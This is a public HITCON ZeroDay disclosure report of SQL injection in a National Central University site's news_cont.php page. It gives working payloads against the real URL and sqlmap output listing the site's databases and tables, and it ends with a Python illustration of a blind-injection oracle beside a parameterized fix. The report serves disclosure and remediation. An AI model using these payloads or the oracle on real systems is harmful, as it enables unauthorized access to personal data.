SQL Injection on a National Central University (國立中央大學) Site - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00340
  • Vendor: National Central University (國立中央大學)
  • Title: SQL injection on a National Central University site
  • Introduction: SQL injection in the National Central University Germination Function Center (萌芽功能中心) site

Handling Status

Current status

Public
Last Update : 2018/06/01
  • Newly submitted
  • Reviewed
  • Reported to vendor
  • Patch status not reported
  • Not retested
  • Public

Handling History

  • 2018/04/01 01:49:54 : Newly submitted (status updated by Cra5h)
  • 2018/04/01 15:41:28 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/02 12:01:24 : Patch in progress (status updated by the HITCON ZeroDay service team)
  • 2018/04/02 12:01:25 : Patch in progress (status updated by the HITCON ZeroDay service team)
  • 2018/06/01 03:00:15 : Public (updated automatically by the HITCON ZeroDay platform)

Details

  • ZDID: ZD-2018-00340
  • Reporter: cra5h (Cra5h)
  • Risk: High
  • Type: Database injection attack (SQL Injection)

References

An attacker can use this vulnerability to gain access to the back-end database and retrieve its complete contents (including large volumes of users' personal or sensitive data), and may also be able to destroy or modify that data.

Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(The information in this field is generated automatically by the system from the vulnerability category, as reference material for the vulnerability.)

Related URLs

http://ncugfc.ncu.edu.tw/news_cont.php?Key=14

Description

SQL injection in the National Central University Germination Function Center (萌芽功能中心) site
SQL injection location:
http://ncugfc.ncu.edu.tw/news_cont.php?Key=14
Insufficient filtering of the Key parameter leads to SQL injection
Parameter: Key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Key=14 AND 7512=7512

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: Key=14 AND (SELECT 2518 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(2518=2518,1))),0x7171787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

[01:45:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[01:45:43] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\ncugfc.ncu.edu.tw'

Confirmed affected databases (7):
[01:46:17] [INFO] fetching database names
[01:46:18] [WARNING] reflective value(s) found and filtering out
[01:46:18] [INFO] used SQL query returns 7 entries
[01:46:18] [INFO] retrieved: information_schema
[01:46:18] [INFO] retrieved: IIC
[01:46:18] [INFO] retrieved: iic_ncu_edu_tw
[01:46:18] [INFO] retrieved: mysql
[01:46:19] [INFO] retrieved: ncugfc_ncu_edu_tw
[01:46:19] [INFO] retrieved: niic
[01:46:19] [INFO] retrieved: pcn888
available databases [7]:
[*] IIC
[*] iic_ncu_edu_tw
[*] information_schema
[*] mysql
[*] ncugfc_ncu_edu_tw
[*] niic
[*] pcn888

[01:46:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\ncugfc.ncu.edu.tw'

Checking data volume (row counts per table):
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1009 |
| help_topic | 510 |
| help_keyword | 453 |
| help_category | 40 |
| user | 2 |
+---------------------------------------+---------+

Database: iic_ncu_edu_tw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| calendar | 1007 |
| address_data | 374 |
| contest_troop_up | 346 |
| contest_troop | 222 |
| avtive_people | 215 |
| news | 184 |
| bz | 123 |
| committee4 | 118 |
| active_unit | 100 |
| record | 75 |
| files | 72 |
| movie | 67 |
| study_process | 59 |
| study2_sign | 50 |
| calendar2 | 48 |
| study3_sign | 48 |
| committee3 | 47 |
| message | 44 |
| download3 | 41 |
| links | 29 |
| service_catalog | 28 |
| news2 | 24 |
| active_sign | 21 |
| about | 17 |
| download2 | 13 |
| study3 | 13 |
| system | 12 |
| send_ok | 11 |
| download4 | 10 |
| adv_links3 | 8 |
| committee | 8 |
| necessary | 8 |
| news3 | 8 |
| adv_links2 | 6 |
| download | 6 |
| committee5 | 5 |
| contest_file | 5 |
| contest_Type | 5 |
| news9 | 5 |
| news_catalog | 5 |
| topphoto | 4 |
| about_member | 3 |
| active_Identity | 3 |
| contest_result | 3 |
| links2 | 3 |
| member | 3 |
| committee2 | 2 |
| link_catalog | 2 |
| study2 | 2 |
| study_sign | 2 |
| active | 1 |
| admin | 1 |
| counter | 1 |
| download5 | 1 |
| epaper | 1 |
| epaperlist | 1 |
| link2_catalog | 1 |
| onnews | 1 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2798 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| PARTITIONS | 198 |
| STATISTICS | 198 |
| TABLES | 198 |
| KEY_COLUMN_USAGE | 191 |
| TABLE_CONSTRAINTS | 169 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| USER_PRIVILEGES | 54 |
| CHARACTER_SETS | 36 |
| PLUGINS | 7 |
| SCHEMATA | 7 |
| ENGINES | 5 |
| PROCESSLIST | 1 |
+---------------------------------------+---------+

Database: ncugfc_ncu_edu_tw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| study_sign | 44 |
| system | 39 |
| module_custom_catalog | 30 |
| login_log | 26 |
| module_files | 25 |
| photo | 19 |
| module_news | 16 |
| module_qa | 14 |
| about | 13 |
| module_label_record | 13 |
| module_catalog | 12 |
| module_news_catalog_files | 12 |
| module_adv_links | 10 |
| module_committee | 8 |
| module_contact | 7 |
| module_ini | 7 |
| orders_status | 7 |
| payment | 5 |
| product_catalog | 5 |
| adv_links | 4 |
| product | 4 |
| member | 3 |
| module_news_catalog | 3 |
| photo_catalog | 3 |
| study | 3 |
| topphoto | 3 |
| admin | 2 |
| module_editer | 2 |
| topphoto2 | 2 |
| counter | 1 |
| seller | 1 |
+---------------------------------------+---------+

[01:48:13] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\ncugfc.ncu.edu.tw'

Remediation Advice

Input filtering and parameterized queries
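Added example, not code from the report or from the NCU site: a small Python/sqlite3 re-creation of the pattern the report describes (a `news_cont` lookup that concatenates the `Key` GET parameter into the WHERE clause) beside the hardened version the remediation line calls for. The `news` table, its rows and all function names are constructed for illustration; sqlite stands in for the MySQL back end, so the schema probe reads `sqlite_master` where sqlmap used `information_schema`. It generalizes the report's boolean-based blind payload (`Key=14 AND 7512=7512`) into the yes/no oracle sqlmap builds from it, and uses that oracle to recover one schema fact (a table-name length) without ever reading a row. Note that neither payload in the report contains a quote character, so quote-escaping alone would not have stopped it; the hardened lookup allow-lists the parameter as decimal digits and binds it.

```python
"""Added illustration for this report: a minimal re-creation of the
injection pattern in news_cont.php?Key=... (string concatenation into
SQL) next to a hardened lookup. Hypothetical code; not the NCU site's
source. sqlite3 stands in for the MySQL back end the report found."""
import re
import sqlite3

# Constructed sample rows standing in for the site's news table.
SAMPLE_ROWS = [
    (13, "Older announcement"),
    (14, "Call for proposals"),
    (15, "Workshop schedule"),
]


def make_db() -> sqlite3.Connection:
    """In-memory database holding the constructed `news` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def news_cont_vulnerable(conn: sqlite3.Connection, key: str) -> list:
    """The flaw as reported: the raw GET parameter is concatenated into the
    WHERE clause, so `Key=14 AND 7512=7512` is parsed as SQL, not as a key.
    No quote is needed because the value sits in a numeric context."""
    sql = "SELECT id, title FROM news WHERE id=" + key
    return conn.execute(sql).fetchall()


def news_cont_hardened(conn: sqlite3.Connection, key: str) -> list:
    """Both measures from the remediation line: the parameter is
    allow-listed as decimal digits (quote-escaping alone would not stop
    the numeric payload above) and then bound as a query parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", key):
        raise ValueError("Key must be a decimal integer")
    sql = "SELECT id, title FROM news WHERE id=?"
    return conn.execute(sql, (int(key),)).fetchall()


def boolean_blind_oracle(lookup, conn, base: str, condition: str) -> bool:
    """The yes/no oracle behind sqlmap's boolean-based blind technique:
    append `AND <condition>` to a known-good key and compare the result
    with the untampered request. Identical output means the condition
    held; an empty page means it was false."""
    baseline = lookup(conn, base)
    probed = lookup(conn, f"{base} AND {condition}")
    return probed == baseline


def table_name_length_blind(lookup, conn, base: str, max_len: int = 64) -> int:
    """Uses the oracle to pull one schema fact out without seeing a row:
    the length of the first table name. sqlite_master is the sqlite
    stand-in for the information_schema tables sqlmap queried."""
    probe = "(SELECT LENGTH(name) FROM sqlite_master WHERE type='table' LIMIT 1)={n}"
    for n in range(1, max_len + 1):
        if boolean_blind_oracle(lookup, conn, base, probe.format(n=n)):
            return n
    return -1


if __name__ == "__main__":
    db = make_db()
    print("true  probe:", boolean_blind_oracle(news_cont_vulnerable, db, "14", "7512=7512"))
    print("false probe:", boolean_blind_oracle(news_cont_vulnerable, db, "14", "7512=7513"))
    print("table name length:", table_name_length_blind(news_cont_vulnerable, db, "14"))
    print("hardened, valid key:", news_cont_hardened(db, "14"))
    try:
        news_cont_hardened(db, "14 AND 7512=7512")
    except ValueError as exc:
        print("hardened, payload rejected:", exc)
```

Run as a script, the vulnerable lookup answers the true probe with the same row as the clean request and the false probe with nothing, which is exactly the differential sqlmap reported as "boolean-based blind"; the hardened lookup never lets the payload reach the database. In a real MySQL deployment the same two changes apply with mysqli or PDO prepared statements.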
